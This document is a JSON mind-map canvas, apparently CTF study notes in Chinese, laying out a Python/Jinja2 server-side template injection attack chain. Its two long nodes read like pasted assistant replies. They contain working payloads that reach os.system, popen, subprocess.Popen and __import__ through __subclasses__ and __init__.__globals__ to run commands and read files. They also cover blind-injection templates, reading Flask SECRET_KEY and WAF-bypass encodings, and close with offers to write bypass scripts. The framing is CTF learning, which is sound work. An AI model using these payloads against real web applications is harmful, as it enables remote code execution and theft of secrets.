{
	"nodes":[
		{"id":"9a3fade4b9365224","x":-199,"y":-357,"width":219,"height":50,"type":"text","text":"进入题目，寻找注入点"},
		{"id":"b0457658a8e5b949","x":-214,"y":-240,"width":250,"height":60,"type":"text","text":"{{2\\*2}}验证注入点"},
		{"id":"e9c39158e1cd0935","x":-214,"y":-120,"width":250,"height":110,"type":"text","text":"{{\"\".\\_\\_class\\_\\_}}把class拼接到字符串，尝试明文显示类信息"},
		{"id":"7117250b1f35867c","x":-213,"y":54,"width":250,"height":60,"type":"text","text":"寻找父类"},
		{"id":"14c6e8e07c855099","x":100,"y":84,"width":250,"height":60,"type":"text","text":"拼接\\_\\_mro\\_\\_，获取继承信息"},
		{"id":"de606c5a98ebc0ed","x":100,"y":24,"width":250,"height":60,"type":"text","text":"拼接\\_\\_bases\\_\\_，获取父类"},
		{"id":"b163514989ccb4b0","x":-213,"y":175,"width":250,"height":85,"type":"text","text":"拼接\\_\\_subclasses\\_\\_从顶端开始直接寻找所有子类和子方法"},
		{"id":"432a92552de56599","x":-213,"y":500,"width":250,"height":60,"type":"text","text":"获取flag"},
		{"id":"392297783f599fe0","x":-338,"y":340,"width":250,"height":60,"type":"text","text":"找到可以执行系统命令的方法"},
		{"id":"d2fcc50c2e772c29","x":-87,"y":340,"width":250,"height":60,"type":"text","text":"找到全局符号表里面包含os相关模块的类"},
		{"id":"18430f2d4e87def7","x":260,"y":175,"width":542,"height":266,"type":"text","text":"`__subclasses__()` 的输出取决于调用它的**类**以及**当前 Python 解释器已经加载的模块**。它会返回**直接**继承该类的子类列表（不包含间接子类）。\n\n为了让你直观理解，我先写一段**可以在你自己电脑上运行的探索代码**，然后解释常见的输出类别及其在 SSTI 中的用途。\n\n## 1. 基础探索代码\n\n```python\n# 查看 object 的所有直接子类\nfor i, cls in enumerate(object.__subclasses__()):\n    print(f\"{i:3d}: {cls.__name__:30s} - {cls.__module__}\")\n```\n\n**典型输出（Python 3.10+，只显示前20个）：**\n```\n  0: type                         - builtins\n  1: weakref                      - _weakref\n  2: weakcallableproxy            - _weakref\n  3: weakproxy                    - _weakref\n  4: int                          - builtins\n  5: bytearray                    - builtins\n  6: bytes                        - builtins\n  7: list                         - builtins\n  8: tuple                        - builtins\n  9: str                          - builtins\n 10: float                        - builtins\n 11: complex                      - builtins\n 12: range                        - builtins\n 13: dict                         - builtins\n 14: set                          - builtins\n 15: frozenset                    - builtins\n 16: slice                        - builtins\n 17: staticmethod                 - builtins\n 18: classmethod                  - builtins\n 19: enumerate                    - builtins\n ... 还有几百个 ...\n```\n\n## 2. 常见输出类别及其在 SSTI 中的用途\n\n### 类别 1：**内建类型**（索引 0-50 左右）\n```python\nstr, list, dict, tuple, int, float, bool, bytes, bytearray, set, frozenset\n```\n- **用途**：通常不是直接目标，但可以用来**类型转换**或**构造新对象**（如 `''.__class__` 已经就是 str）\n- **SSTI 价值**：低，因为它们很少包含危险的 `__globals__`\n\n### 类别 2：**弱引用相关**（1-3）\n```python\nweakref, weakcallableproxy, weakproxy\n```\n- **用途**：几乎没用，不能直接执行命令\n\n### 类别 3：**警告和异常类**\n```python\nWarning, UserWarning, DeprecationWarning, SyntaxError, TypeError, ...\n```\n- **用途**：在构造**错误对象**时可能会触发某些行为，但通常不是直接利用目标\n\n### 类别 4：**函数和方法的包装器**（17-19）\n```python\nstaticmethod, classmethod, enumerate, property\n```\n- **用途**：它们有 `__func__` 或 `__get__` 属性，有时可以用来获取函数对象\n- **SSTI 价值**：中，需要组合使用\n\n### 类别 5：**模块相关的类**（中等索引，50-150 常见）\n```python\n<class 'module'>           # 模块类型\n<class 'builtin_function_or_method'>  # 内建函数\n<class 'method_descriptor'>\n<class 'classmethod_descriptor'>\n```\n- **用途**：`module` 类可能包含 `__loader__` 或 `__spec__`，进而访问 `os`\n- **SSTI 价值**：高，但需要深入探索\n\n### 类别 6：**I/O 相关类**（非常重要，索引位置不定）\n```python\n<class '_io._IOBase'>      # IO 基类\n<class '_io.BytesIO'>\n<class '_io.TextIOWrapper'>\n<class 'os._wrap_close'>   # 关键！os 模块的包装类\n```\n- **`os._wrap_close`**：这是 SSTI 中的**明星类**，因为：\n  ```python\n  # 它有一个 __init__ 方法，其 __globals__ 包含 os 模块\n  object.__subclasses__()[某个索引].__init__.__globals__['system']\n  ```\n- **用途**：直接执行系统命令\n\n### 类别 7：**subprocess 相关类**\n```python\n<class 'subprocess.Popen'>\n<class 'subprocess.CompletedProcess'>\n```\n- **用途**：如果能看到，可以直接用 `Popen` 执行命令\n- **SSTI 价值**：极高，但通常索引靠后（200+）\n\n### 类别 8：**框架或应用加载的类**（如 Flask、Django）\n```python\n<class 'flask.ctx.RequestContext'>\n<class 'werkzeug.datastructures.ImmutableDict'>\n<class 'jinja2.runtime.Template'>\n```\n- **用途**：可以访问应用上下文、配置、甚至 `current_app`\n- **SSTI 价值**：高，可能绕过过滤，或者读取文件、源码\n\n### 类别 9：**内置函数和类型的包装器**\n```python\n<class 'wrapper_descriptor'>\n<class 'method-wrapper'>\n```\n- **用途**：它们的 `__self__` 或 `__objclass__` 可能指向有用的类\n\n## 3. 不同环境下的差异\n\n| 环境 | 典型特征 | 常见可利用类 |\n|------|---------|--------------|\n| **纯 Python 脚本** | 只有 builtins 和少量标准库 | `os._wrap_close`（如果有 import os） |\n| **Flask 应用** | 大量 werkzeug、jinja2、flask 类 | `os._wrap_close`、`subprocess.Popen`、`flask.Flask` 的 `__call__` |\n| **Django** | django 核心类、中间件 | `django.core.servers.basehttp.WSGIRequestHandler` 的 `__init__` |\n| **Jinja2 模板注入** | 模板运行时类、环境类 | `jinja2.Environment` 的 `__globals__` 包含 `os` |\n| **受限环境（禁用 os）** | 可能没有 `os._wrap_close` | 需要找 `warnings.catch_warnings` → `linecache` → `os` |\n\n## 4. 实用技巧：如何找到可用的类\n\n### 方法一：暴力扫描（本地测试）\n```python\ndef find_os_system():\n    for cls in object.__subclasses__():\n        try:\n            if 'system' in cls.__init__.__globals__:\n                print(f\"Found at index {i}: {cls}\")\n                return cls\n        except:\n            pass\n    # 备用方案：找 warnings.catch_warnings\n    for cls in object.__subclasses__():\n        if cls.__name__ == 'catch_warnings':\n            return cls.__init__.__globals__['__builtins__']['__import__']('os')\n```\n\n### 方法二：链式查找（绕过常见过滤）\n```python\n# 如果 __subclasses__ 被禁，用 __bases__ 或 __mro__\n\"\".__class__.__bases__[0].__subclasses__()\n\n# 如果直接索引被禁，用列表推导\n[].__class__.__bases__[0].__subclasses__()[x] for x in range(500)\n```\n\n### 方法三：非 os 路径（如果 system 被禁）\n```python\n# 1. 利用 subprocess\ncls = [c for c in object.__subclasses__() if 'Popen' in c.__name__][0]\ncls('cat flag', shell=True, stdout=-1).communicate()\n\n# 2. 利用 eval/exec\n[cls for cls in object.__subclasses__() if 'BuiltinImporter' in cls.__name__][0].load_module('os').system('cat flag')\n\n# 3. 利用文件读取（写 webshell）\n[cls for cls in object.__subclasses__() if 'FileLoader' in cls.__name__][0]\n```\n\n## 5. 真实 CTF 案例：为什么索引 134 可能是 `os._wrap_close`？\n\n在你提供的 URL 中，索引 134 很可能是 `os._wrap_close`，因为：\n- `os` 模块在 Python 启动时通常会被加载（即使没显式 import）\n- `_wrap_close` 是一个内部类，用来包装文件描述符\n- 它的 `__init__.__globals__` 正好包含 `os` 模块\n\n验证代码：\n```python\n# 假设在目标环境\ncls = object.__subclasses__()[134]\nprint(cls)  # <class 'os._wrap_close'>\nprint('system' in cls.__init__.__globals__)  # True\n```\n\n## 总结表格\n\n| 输出类型 | 典型索引范围 | SSTI 用途 | 风险等级 |\n|---------|------------|-----------|---------|\n| 内建类型 | 0-50 | 类型转换、构造字符串 | 低 |\n| 异常类 | 50-100 | 触发错误、绕过过滤 | 中 |\n| I/O 类 | 80-150 | **获取 `os` 模块** | **极高** |\n| subprocess | 150-250 | 直接执行命令 | 极高 |\n| 框架类 | 不定 | 读取配置、源码 | 高 |\n| 装饰器类 | 30-70 | 组合调用函数 | 中 |\n\n**核心思路**：`__subclasses__()` 给你一个**所有类的名单**，你需要在这个名单里找到一个类，它要么：\n1. 直接包含 `system`、`popen` 等函数（在 `__globals__` 中）\n2. 能够帮你导入 `os` 模块（通过 `__builtins__.__import__`）\n3. 能够读写文件（通过 `open`、`file` 等）\n\n你现在想针对具体的 Python 环境（比如 3.9、3.11）练习查找可用的类吗？我可以帮你写一个自动扫描脚本。"},
		{"id":"f437167f6beb7e80","x":-588,"y":340,"width":250,"height":60,"type":"text","text":"warning等方法"},
		{"id":"e062452dfec96d22","x":260,"y":500,"width":542,"height":200,"type":"text","text":"在 SSTI 中，拿到 `__subclasses__()` 列表后，寻找执行命令的方法主要围绕两个核心目标：**直接找到已加载的 `os` 模块**，或**找到一个能动态导入模块的危险函数**（如 `__import__`）。\n\n根据利用链的“距离”，我将其分为**高、中、低**三个优先级路径，并结合你之前提到的 `__init__.__globals__` 来梳理。\n\n### 🎯 路径一：高优先级 —— 直接利用 `os` 模块\n\n这是最直接的路径，只要在 `__globals__` 字典中能找到 `os` 或 `system` 即可。具体类在不同环境下有差异：\n\n| 目标类/对象 | 访问方式 (在 `__globals__` 中) | 典型 Payload 示例 |\n| :--- | :--- | :--- |\n| **`os._wrap_close`** | `['os']` 或直接 `['system']` | `''.__class__.__mro__[1].__subclasses__()[134].__init__.__globals__['os'].system('cat flag')` |\n| **`warnings.catch_warnings`** | `['sys'].modules['os']` | `''.__class__.__mro__[1].__subclasses__()[134].__init__.__globals__['sys'].modules['os'].popen('cat flag').read()` |\n| **`subprocess.Popen`** | 直接使用 (非 `globals`) | `''.__class__.__mro__[1].__subclasses__()[138]('cat flag', shell=True, stdout=-1).communicate()[0]` |\n\n> **注意**：索引 `134` 仅为示例。在不同 Python 版本或框架中，`warnings.catch_warnings` 或 `os._wrap_close` 的位置会变动，需通过遍历或报错信息确定。\n\n### 🛠️ 路径二：中优先级 —— 通过 `__builtins__` 调用 `__import__`\n\n如果找不到直接可用的 `os` 模块，可以寻找一个包含 `__builtins__` 的类，利用其中的 `__import__` 函数动态导入 `os`。\n\n*   **利用链**：`<类>.__init__.__globals__['__builtins__']['__import__']('os').popen('cat flag').read()`\n*   **场景**：当 `__globals__` 中不直接包含 `os`，但包含 `__builtins__` 时使用。`__builtins__` 是 Python 的内建函数集合。\n*   **示例**：\n    `{{''.__class__.__mro__[1].__subclasses__()[?].__init__.__globals__['__builtins__']['__import__']('os').popen('cat flag').read()}}`\n\n### 📂 路径三：低优先级 —— 文件读取与特殊场景\n\n当命令执行被彻底封禁时，可退而求其次尝试读取文件内容（如 `flag`）或获取敏感信息。\n\n| 方法 | 原理 | 示例 Payload |\n| :--- | :--- | :--- |\n| **文件读取** | 寻找包含 `file` 类或 `open` 函数的 `__builtins__` | `{{().__class__.__bases__[0].__subclasses__()[40]('flag').read()}}` (40为 `file` 类索引) |\n| **读取配置** | 直接读取 Flask 应用的 `config` 对象 | `{{config['SECRET_KEY']}}` 或 `{{self.__dict__}}` |\n| **盲注** | 通过 `if` 语句和响应时间/内容差异来逐字节猜解 | `{% if ''.__class__.__mro__[1].__subclasses__()[?].__init__.__globals__['os'].popen('cat flag').read()[0:1] == 'f' %}yes{% endif %}` |\n\n### 📝 实操步骤：如何编写你的 Payload\n\n在实际 CTF 或测试中，你可以按照以下步骤来构建自己的利用链：\n\n1.  **确定基类**：使用 `''.__class__.__mro__[1]` 或 `[].__class__.__base__` 获取 `object` 类。\n2.  **获取所有子类**：使用 `object.__subclasses__()`。\n3.  **寻找“跳板”类**：这一步通常需要**本地测试**或**写脚本遍历**。你需要寻找一个类，它要么：\n    *   **直接包含** `os` 模块：如 `os._wrap_close` 或 `warnings.catch_warnings`。检查其 `__init__.__globals__` 是否含有 `os`。\n    *   **包含** `__builtins__`：检查其 `__init__.__globals__` 是否含有 `__builtins__`。\n4.  **执行命令或读取文件**：\n    *   **如果找到 `os`**：执行 `['os'].popen('cat flag').read()` 或 `['os'].system('cat flag')`。\n    *   **如果找到 `__builtins__`**：执行 `['__builtins__']['__import__']('os').popen('cat flag').read()`。\n    *   **如果直接找到 `file` 类**：执行 `('flag')` 或 `('flag').read()`。\n\n**自动遍历脚本示例（本地测试用）**：\n```python\nimport subprocess\n\ndef find_os_module():\n    for i, cls in enumerate(object.__subclasses__()):\n        try:\n            # 尝试通过 __init__.__globals__ 寻找 os 模块\n            if 'os' in cls.__init__.__globals__:\n                print(f\"[+] 在索引 {i} 的类 {cls.__name__} 的 __globals__ 中找到 os 模块\")\n                # 可选：测试命令执行\n                # cls.__init__.__globals__['os'].system('whoami')\n                return i\n            # 尝试寻找 __builtins__\n            if '__builtins__' in cls.__init__.__globals__:\n                print(f\"[+] 在索引 {i} 的类 {cls.__name__} 的 __globals__ 中找到 __builtins__\")\n        except:\n            pass\n    return None\n\nfind_os_module()\n```\n\n### 🚀 进阶技巧：绕过 WAF\n\n如果网站拦截了 `__class__`、`__globals__` 等关键字，可以使用以下方法绕过：\n\n*   **使用 `attr()`**：`|attr('__class__')` 代替 `.__class__`\n*   **使用 `request` 传参**：将关键字放在 GET 参数中，如 `{{request|attr(request.args.get('x'))}}&x=__class__`\n*   **使用十六进制编码**：将 `_` 转换为 `\\x5f`，如 `\\x5f\\x5fclass\\x5f\\x5f`\n*   **使用字符串拼接**：`['__cl'+'ass__']`\n\n---\n\n**总结来说**，在 `__subclasses__()` 返回的众多类中，**优先寻找 `os` 模块或 `warnings.catch_warnings` 等常包含系统交互的类**。如果都没有，再退而求其次，利用 `__builtins__` 中的 `__import__` 来导入 `os` 模块。最后，当命令执行实在困难时，可以尝试直接读取文件或利用盲注技术。\n\n你现在是在做某个具体的 CTF 题目吗？如果遇到了过滤（比如 banned 了某些关键词），可以把题目源码或过滤规则发给我，我帮你写对应的绕过脚本。"}
	],
	"edges":[
		{"id":"09c3e292bdef3179","fromNode":"9a3fade4b9365224","fromSide":"bottom","toNode":"b0457658a8e5b949","toSide":"top"},
		{"id":"22b106a5eb83be40","fromNode":"b0457658a8e5b949","fromSide":"bottom","toNode":"e9c39158e1cd0935","toSide":"top"},
		{"id":"f0dc879ef5cf621b","fromNode":"e9c39158e1cd0935","fromSide":"bottom","toNode":"7117250b1f35867c","toSide":"top"},
		{"id":"4f7a913c662fe20f","fromNode":"7117250b1f35867c","fromSide":"right","toNode":"de606c5a98ebc0ed","toSide":"left"},
		{"id":"e025dbdbd3ede49a","fromNode":"7117250b1f35867c","fromSide":"right","toNode":"14c6e8e07c855099","toSide":"left"},
		{"id":"c535535d68120175","fromNode":"7117250b1f35867c","fromSide":"bottom","toNode":"b163514989ccb4b0","toSide":"top"},
		{"id":"b82f416f4fe04250","fromNode":"b163514989ccb4b0","fromSide":"bottom","toNode":"392297783f599fe0","toSide":"top"},
		{"id":"8cf47ade7d9cd92c","fromNode":"392297783f599fe0","fromSide":"bottom","toNode":"432a92552de56599","toSide":"top"},
		{"id":"4945ee1dc88e2efb","fromNode":"b163514989ccb4b0","fromSide":"bottom","toNode":"d2fcc50c2e772c29","toSide":"top"},
		{"id":"c7fd351e2c9494ee","fromNode":"d2fcc50c2e772c29","fromSide":"bottom","toNode":"432a92552de56599","toSide":"top"},
		{"id":"c3baa8fe458bd3b2","fromNode":"b163514989ccb4b0","fromSide":"right","toNode":"18430f2d4e87def7","toSide":"left"},
		{"id":"550690358e987eb7","fromNode":"b163514989ccb4b0","fromSide":"left","toNode":"f437167f6beb7e80","toSide":"top"},
		{"id":"d9ec45548b3d4c76","fromNode":"f437167f6beb7e80","fromSide":"bottom","toNode":"432a92552de56599","toSide":"left"},
		{"id":"a76cb119bdd941e2","fromNode":"e062452dfec96d22","fromSide":"left","toNode":"432a92552de56599","toSide":"right"}
	]
}